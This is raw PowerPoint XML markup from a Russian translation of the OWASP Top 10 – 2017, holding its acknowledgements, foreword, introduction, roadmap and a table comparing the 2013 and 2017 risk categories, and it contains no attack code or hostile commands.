          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11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34537"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8166478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</a:rPr>
                        <a:t>Организации, предоставившие данные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Хотим поблагодарить организации, которые предоставили свои данные по уязвимостям для Топ-10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="8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— </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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2017: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ru-RU" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="ru-RU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361950" algn="l"/>
                          <a:tab pos="1885950" algn="l"/>
                          <a:tab pos="1971675" algn="l"/>
                          <a:tab pos="3409950" algn="l"/>
                          <a:tab pos="3495675" algn="l"/>
                          <a:tab pos="4933950" algn="l"/>
                          <a:tab pos="5019675" algn="l"/>
                        </a:tabLst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800" u="none" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2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ru-RU" sz="950" u="none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Впервые все данные, предоставленные для выпуска Топ-10, а также полный список источников </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="none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доступны публично</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="none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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Отдельные участники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74898"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="416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</a:rPr>
                        <a:t>Хотим поблагодарить отдельных участников проекта, которые внесли ощутимый вклад в работу по созданию Топ-10 на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</a:rPr>
                        <a:t>GitHub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="none" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill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92D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92D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Также хотим поблагодарить всех, кто присылал свои отзывы через Твиттер, по электронной почте или каким-либо другим способом.</a:t>
                      </a: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И конечно, мы хотим отметить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Дирка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Веттера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Dirk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Wetter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), Джима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Манико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Jim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Manico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 и Осаму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Эльнаггара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Osama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Elnaggar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 за их огромный вклад. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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Также, неоценимую помощь в создании новой категории </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Небезопасная </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>десериализация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оказали Крис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Фрохофф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Chris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Frohoff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 и Габриэль Лоуренс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Gabriel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Lawrence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172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6CA28A-C875-42F4-A969-9E4EBCDC2625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5202070"/>
            <a:ext cx="6858000" cy="3105345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="5" spcCol="274320" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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ak47gen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alonergan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ameft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anantshri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bandrzej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bchurchill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binarious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bkimminich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Boberski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borischen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Calico90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chrish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clerkendweller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D00gs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davewichers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drkknight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drwetter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dune73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ecbftw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einsweniger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ekobrin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eoftedal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frohoff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fzipi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gebl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Gilc83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gilzow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global4g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grnd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h3xstream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hiralph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HoLyVieR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ilatypov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irbishop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itscooper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ivanr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jeremylong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jhaddix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jmanico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joaomatosf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jrmithdobbs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jsteven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jvehent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katyanton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kerberosmansour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koto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m8urnett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mwcoates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neo00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nickthetait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ninedter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ossie-git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PauloASilva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PeterMosmans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pontocom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psiinon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pwntester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raesene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riramar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ruroot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securestep9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securitybits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SPoint42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sreenathsasikumar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starbuck3000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stefanb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sumitagarwalusa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taprootsec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tghosth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TheJambo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thesp0nge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toddgrotenhuis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troymarshall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tsohlacol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vdbaan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yohgaki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>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans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C5A71-CDF7-40E6-9F8A-7B7F0554B2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722" y="1601670"/>
            <a:ext cx="6849278" cy="2655328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="4" spcCol="457200" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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ANCAP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Aspect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AsTech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Consulting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Atos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Branding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Brand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Bugcrowd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BUGemot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CDAC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Checkmarx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Colegio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LaSalle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Monteria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Company.com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ContextIS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Contrast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DDoS.com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Derek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Weeks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Easybss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Edgescan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EVRY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EZI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Hamed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Hidden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I4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Consulting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iBLISS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Seguran̤a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&amp;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Intelig̻encia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ITsec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Services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bv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Khallagh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Linden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Lab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M.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Limacher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IT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Dienstleistungen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Micro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Focus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Fortify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Minded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National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Center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for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Cyber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Technology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Network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Test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Labs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Inc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Osampa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Paladion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Networks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Purpletalk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Network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Shape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SHCP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Softtek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Synopsis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TCS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Vantage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Point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Veracode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Web.com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17835"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="953596"/>
          <a:ext cx="6858000" cy="8208914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7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</a:rPr>
                        <a:t>Предисловие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77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Ненадежное программное обеспечение подрывает безопасность критических инфраструктур, относящихся, например, к здравоохранению, обороне, энергетике или финансам. Программное обеспечение становится сложнее, устройств, подключенных к сети, становится больше, поэтому важность обеспечения безопасности приложений  возрастает экспоненциально. Быстрое развитие методов разработки ПО приводит к необходимости быстро и безошибочно выявлять, а также устранять наиболее часто возникающие угрозы. Больше нельзя оставлять без должного внимания относительно простые угрозы безопасности, подобные представленным в данном списке Топ-10 OWASP.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При создании Топ-10 OWASP — 2017 было получено огромное количество отзывов, намного больше, чем по любым другим проектам OWASP. Это показывает, насколько сообщество заинтересовано в Топ-10 OWASP и насколько важно для OWASP сделать Топ-10 актуальным для большинства сценариев использования.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Несмотря на то, что первоначальная цель проекта Топ-10 OWASP заключалась в простом привлечении внимания разработчиков и менеджеров к проблемам безопасности, проект де-факто стал стандартом безопасности приложений. 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 этом выпуске проблемы и рекомендации по их устранению описаны кратко и в доступной форме для облегчения внедрения Топ-10 OWASP в программы обеспечения безопасности приложений. Крупным и высокопроизводительным организациям, которым требуется настоящий стандарт, мы рекомендуем использовать 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Стандарт подтверждения безопасности приложений OWASP (ASVS)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но для большинства при обеспечении безопасности приложений будет достаточно Топ-10 OWASP.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Мы также составили перечни рекомендуемых шагов для разных категорий пользователей Топ-10 OWASP, такие как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Что делать разработчикам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Что делать </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1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тестировщикам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Что делать организациям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(для директоров по информационным технологиям и директоров по информационной безопасности), а также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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Что делать менеджерам приложений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(для менеджеров приложений или лиц, ответственных за жизненный цикл приложений).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 конечном счете мы призываем все команды и организации, занимающиеся разработкой ПО, создать свою программу обеспечения безопасности приложений, которая будет соответствовать их культурному и технологическому уровню. Эти программы могут быть представлены в любой форме и объеме. Для оценки и улучшения существующей программы обеспечения безопасности приложений в вашей организации вы можете использовать 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Модель обеспечения безопасности ПО (SAMM)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Надеемся, что Топ-10 OWASP окажется полезным при обеспечении безопасности ваших приложений. Все вопросы, комментарии и идеи вы можете оставлять в нашем проектном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репозитории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на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GitHub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</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buChar char="•"/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https://github.com/OWASP/Top10/issues</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="127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OWASP и переводы можно найти здесь:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buChar char="•"/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https://www.owasp.org/index.php/top10</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="127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Наконец, мы хотим поблагодарить основателей проекта Топ-10 OWASP, Дейва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Вичерса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Dave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Wichers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 и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Джеффа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Вильямса (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Jeff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Williams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), за их вклад и веру в успешное завершение данного документа стараниями сообщества. Большое вам спасибо!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Эндрю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ван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дер Сток (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Andrew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van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der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Stock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Брайан Глас (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Brian</a:t>
                      </a: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/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Glas</a:t>
                      </a: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)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Нил </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Смитлайн</a:t>
                      </a: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 (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neil</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Smithlin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" kern="120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e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950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endParaRPr lang="ru-RU" sz="950" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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Торстен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Гиглер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(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Torsten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Gigler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+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Поддержка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284831"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="423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Благодарим компанию </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="80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Autodesk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за спонсорскую поддержку Топ-10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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— 2017.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Организации и отдельные лица, предоставившие данные по преобладающим уязвимостям или оказавшие иное содействие при создании списка, перечислены на странице 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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>"Благодарности"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40266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П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  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Предисловие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9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6EF41C-22F0-4CD0-98DC-529189A47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91980"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990598"/>
          <a:ext cx="6858000" cy="815340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1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Представляем Топ-10 OWASP — 2017!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof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1248"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90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Это крупное обновление включает в себя несколько новых категорий угроз, две из которых были выбраны сообществом (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Небезопасная </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>десериализация</a:t>
                      </a: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900" b="1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A10:2017-Недостатки </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="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журналирования</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1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 и мониторинга</a:t>
                      </a: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). Два ключевых отличия подготовки данной версии Топ-10 OWASP заключаются в активной обратной связи сообщества и внушительном объеме данных, полученном от десятков организаций, возможно самом большом из когда-либо собранных при подготовке стандарта по обеспечению безопасности приложений. Все это дает нам уверенность в том, что новая версия Топ-10 OWASP посвящена самым актуальным проблемам безопасности приложений, с которыми сталкиваются организации в настоящее время.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OWASP — 2017 основан главным образом на более чем 40 комплектах данных, полученных от организаций, которые специализируются на безопасности приложений, а также на отраслевых исследованиях, проведенных более чем 500 независимыми исследователями. Данные содержат информацию об уязвимостях, обнаруженных в сотнях организаций и более чем 100 000 реальных приложений и API. На основе данных о распространенности, простоте эксплуатации и сложности обнаружения уязвимостей, а также ущербе, который они могут нанести, составляется список Топ-10.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Основной целью Топ-10 OWASP является ознакомление разработчиков, проектировщиков, архитекторов, менеджеров и организаций в целом с рисками, связанными с наиболее распространенными и существенными недостатками в безопасности веб-приложений. Топ-10 также предлагает базовые способы защиты от подобных рисков и руководства по дальнейшим действиям.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2601"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3810000"/>
          <a:ext cx="3352800" cy="53340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400" b="1" spc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Дорожная карта дальнейших действий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 останавливайтесь на 10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Существуют сотни угроз, которые могут повлиять на безопасность веб-приложений. Этой теме посвящены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/>
                        </a:rPr>
                        <a:t>Руководство разработчика OWASP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Памятки OWASP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Данные документы рекомендуются для прочтения всем разработчикам веб-приложений и API. Инструкции по эффективному обнаружению уязвимостей в веб-приложениях и API представлены в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Руководстве OWASP по тестированию</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="78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Продолжайте совершенствоваться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Топ-10 OWASP не стоит на месте и продолжит меняться. Даже без внесения каких-либо правок в код в приложениях могут появиться уязвимости, поскольку обнаруживаются новые векторы атак, а методы эксплуатации уязвимостей совершенствуются. Для получения дополнительной информации рекомендуем ознакомиться с советами, представленными в конце Топ-10 в разделах "Что делать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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Разработчикам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8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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Тестировщикам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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Организациям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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Менеджерам приложений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".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Мыслите позитивно</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="78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Если вы хотите прекратить искать уязвимости и готовы перейти к созданию надежной системы обеспечения безопасности приложений, то в качестве отправной точки для разработчиков может послужить проект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Реализации </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="78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проактивной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 защиты OWASP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а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Стандарт подтверждения безопасности приложений OWASP (ASVS)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станет хорошим руководством по выбору параметров, которые необходимо контролировать в организациях и приложениях.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Используйте инструменты грамотно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Уязвимости могут быть комплексными и скрываться глубоко в коде. В большинстве случаев наиболее эффективным подходом к поиску и устранению недостатков в безопасности является привлечение экспертов, вооруженных продвинутыми инструментами. Но не рекомендуется полагаться исключительно на инструменты, поскольку это дает ложное ощущение безопасности.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Развивайтесь во всех направлениях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Сосредоточьтесь на том, чтобы сделать безопасность неотъемлемой частью вашей культуры разработки. Дополнительную информацию можно получить, ознакомившись с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Моделью обеспечения безопасности ПО (SAMM)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70357"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="3810000"/>
          <a:ext cx="3429000" cy="5328377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Источники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09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Мы благодарны организациям, которые предоставили информацию об уязвимостях для выпуска обновления 2017 года. На призыв о сборе данных мы получили более 40 откликов. Впервые все данные, собранные для выпуска Топ-10, а также полный список участников проекта доступны публично. Мы полагаем, что это одна из самых больших и разносторонних баз данных по уязвимостям, которая когда-либо собиралась публично.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Поскольку участников проекта намного больше, чем доступного здесь места, мы создали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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>специальную страницу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с указанием внесенного ими вклада. Мы искренне благодарим организации за их решение оказаться на передовой и поделиться своими данными с сообществом. Надеемся, что подобная практика будет продолжаться и все больше организаций будет в этом участвовать; возможно, это станет одним из ключевых этапов в реализации безопасности на основе фактических данных. Создание Топ-10 OWASP было бы невозможным без участия всех этих удивительных людей.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Также мы хотим поблагодарить более чем 500 участников проекта, которые потратили свое время на завершение данного исследования. Мнения этих людей помогли выделить две новые категории для Топ-10. Мы ценим все комментарии, высказывания и критические отзывы, а также потраченное время и хотим выразить вам нашу благодарность.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Хотим поблагодарить участников, которые оставляли свои конструктивные замечания и тратили время на рецензирование нового выпуска Топ-10. На сколько это возможно, мы перечислили их на странице ‘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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Благодарности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’. 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И наконец, хотим заранее поблагодарить всех переводчиков, которые будут переводить данный выпуск Топ-10 на различные языки, помогая тем самым сделать Топ-10 OWASP более доступным.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Введение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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53BBC665-1B35-4A1D-B9C5-F23A14645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74889"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8151509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600" b="1" i="0" u="none" strike="noStrike" noProof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Что изменилось в 2017 году по сравнению с 2013-м?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62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Многое изменилось за последние четыре года, поэтому Топ-10 OWASP также требовались изменения. Мы полностью реорганизовали Топ-10, обновили методологию, применили новый процесс сбора данных, наладили взаимодействие с сообществом, пересмотрели уровни значимости, переписали все угрозы с нуля и добавили ссылки на наиболее распространенные фреймворки и языки.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За последние годы основные технологии и архитектура приложений сильно изменились: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Микросервисы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написанные на node.js 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Spring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Boot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заменяют традиционные монолитные приложения. С приходом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микросервисов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прибавилось проблем с безопасностью, таких как установление доверия между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микросервисами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контейнерами, управление критически важными данными. Код, к которому раньше не предполагалось обращение через интернет, теперь располагается за API или веб-сервисами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RESTful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может быть использован одностраничными и мобильными приложениями. Архитектурные допущения в коде, касающиеся, например, доверенных вызывающих функций, более не актуальны.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Одностраничные приложения, разработанные с использованием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JavaScript-фреймворков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(таких как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Angular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React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), позволяют создавать многофункциональные, модульные интерфейсы. Функциональные возможности клиентов, которые традиционно обеспечивались на стороне сервера, также добавляют проблем с безопасностью.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JavaScript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в настоящее время является основным языком в интернете, node.js работает на стороне сервера, а современные веб-фреймворки (такие как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Bootstrap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Electron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Angular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React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) запускаются в клиентах.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Новые угрозы, выделенные на основе данных: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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A4:2017-Внешние сущности XML (XXE)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— новая категория, выделенная на основе данных, полученных при помощи </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="73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5"/>
                        </a:rPr>
                        <a:t>инструментов тестирования безопасности исходного кода</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="73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(SAST)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Новые угрозы, выделенные сообществом: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Мы попросили сообщество рассмотреть две перспективные категории угроз. Было получено более чем 500 рецензий, после исключения уже выделенных угроз (таких как "Разглашение конфиденциальных данных" и "Внешние сущности XML") были выбраны следующие категории: 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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Небезопасная </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="1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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>десериализация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которая позволяет удаленно выполнить код или осуществить действия с критически важными объектами.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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017-Недостатки </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="1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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>журналирования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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> и мониторинга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которые могут помешать обнаружению вредоносных действий или взломов, реагированию на инциденты, а также расследованию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киберпреступлений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Объединенные или исключенные, но не забытые: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A4-Небезопасные прямые ссылки на объекты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и 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A7-Отсутствие контроля доступа на функциональном уровне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объединены в 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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017-Недостатки контроля доступа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A8-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="730" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Межсайтовая подмена запросов (CSRF)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была обнаружена только в 5% приложений, поскольку большинство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фреймворков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имеют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9"/>
                        </a:rPr>
                        <a:t>средства защиты от CSRF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A10-Непроверенные перенаправления и переадресации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были обнаружены примерно в 8% приложений, но данная категория была вытеснена Внешними сущностями XML (XXE).</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l" rtl="0"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66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29511"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5455920"/>
          <a:ext cx="6858000" cy="3703388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324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15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2013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2017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 – Внедрение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A1:2017-Внедрение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 – Недостатки аутентификации и управления сессиями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A2:2017-Недостатки аутентификации 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 – Межсайтовое выполнение сценариев (XSS)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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A3:2017-Разглашение конфиденциальных данных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 – Небезопасные прямые ссылки на объекты </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1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[Объединено с </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1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A7]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∪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A4:2017-Внешние сущности XML (XXE)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[Новое]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 – Некорректная настройка параметров безопасности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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A5:2017-Недостатки контроля доступа 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[Объединено]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A6 – Разглашение конфиденциальных данных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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A6:2017-Некорректная настройка параметров безопасности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A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="85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ru-RU" sz="85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ru-RU" sz="85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Отсутствие контроля доступа на функциональном уровне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850" b="1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[Объединено с </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1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A4]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∪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A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="85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:2017-Межсайтовое выполнение сценариев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(XSS)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A8 – Межсайтовая подмена запросов (CSRF)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+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t>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A8:2017-Небезопасная </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1" dirty="0" err="1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десериализация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[Новое, Сообщество]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A9 – Использование компонентов с известными уязвимостями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A9:2017-Использование компонентов с известными уязвимостями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 – Непроверенные перенаправления и переадресации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+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t>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A10:2017-Недостатки </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="850" b="1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и мониторинга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[Новое, Сообщество]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR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ЧН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Что нового</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2604361" y="7470757"/>
            <a:ext cx="1026984" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="83276B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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117852" y="6957265"/>
            <a:ext cx="615948" cy="394295"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 515"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="83276B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12958"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="3962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278">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Что такое угрозы безопасности приложений?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122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Злоумышленники могут нанести ущерб вашему бизнесу или организации, используя ваше приложение. Подобные способы использования приложения представляют собой угрозы, которые могут являться, а могут не являться достаточно серьезными, чтобы обращать на них внимание.</a:t>
                      </a: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Иногда эти способы легко найти и эксплуатировать, иногда — очень сложно. Аналогичная ситуация с возможным ущербом: его может не быть совсем или он может лишить вас бизнеса. Чтобы определить риски для вашей организации, оцените вероятности, связанные с источниками угроз, векторами атак и недостатками безопасности, а затем объедините их с оценкой технического и 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репутационного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вреда для вашей организации. Сумма этих факторов определяет совокупный риск.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29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="275144" y="1839310"/>
            <a:ext cx="6201856" cy="2102620"/>
            <a:chOff x="275144" y="2088380"/>
            <a:chExt cx="6201856" cy="2102620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="3343275"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56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57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495300" y="2505077"/>
              <a:ext cx="139699" cy="304801"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Oval 64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8" name="Line 65"/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9" name="Line 66"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="96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10" name="Line 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="240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11" name="Line 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9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12" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2490788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Атака</a:t>
              </a:r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275144" y="2088380"/>
              <a:ext cx="575800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Источники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угроз</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
